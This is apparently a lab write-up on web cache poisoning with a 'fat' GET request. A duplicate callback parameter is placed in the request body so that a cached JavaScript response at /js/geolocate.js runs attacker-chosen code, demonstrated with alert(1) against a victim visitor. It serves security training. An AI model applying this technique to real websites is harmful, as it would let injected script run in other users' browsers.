Web cache poisoning via a fat GET request

Description

This lab is vulnerable to web cache poisoning. It accepts GET requests that have a body, but does not include the body in the cache key. A user regularly visits this site’s home page using Chrome.

Reproduction

  1. Every page imports the script /js/geolocate.js, executing the callback function setCountryCookie(). Send the request GET /js/geolocate.js?callback=setCountryCookie to Burp Repeater.

  2. It is possible to control the name of the function that is called in the response by passing in a duplicate callback parameter via the request body. The cache key is still derived from the original callback parameter in the request line:

Request:

GET /js/geolocate.js?callback=setCountryCookie
…
callback=arbitraryFunction

Response:

HTTP/1.1 200 OK
X-Cache-Key: /js/geolocate.js?callback=setCountryCookie
…
arbitraryFunction({"country" : "United Kingdom"})

  1. Send the request again, but this time pass in alert(1) as the callback function. Check that you can successfully poison the cache.

  2. Remove any cache busters and re-poison the cache. The lab will solve when the victim user visits any page containing this resource import URL.

PoC

Exploitability

An attacker will need to poison the cache with a response that executes alert(1) in the victim’s browser using a fat GET request.